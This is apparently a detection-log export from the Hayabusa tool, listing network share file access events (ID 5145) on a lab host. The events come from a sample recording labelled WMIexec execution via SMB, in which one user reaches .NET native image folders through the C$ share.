\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.094 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.094 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.125 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.125 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.150 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.150 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.182 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.182 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.197 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.197 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.197 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.197 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.197 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.197 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:31.213 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.213 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.251 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.251 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.251 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Temp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.282 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.282 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.282 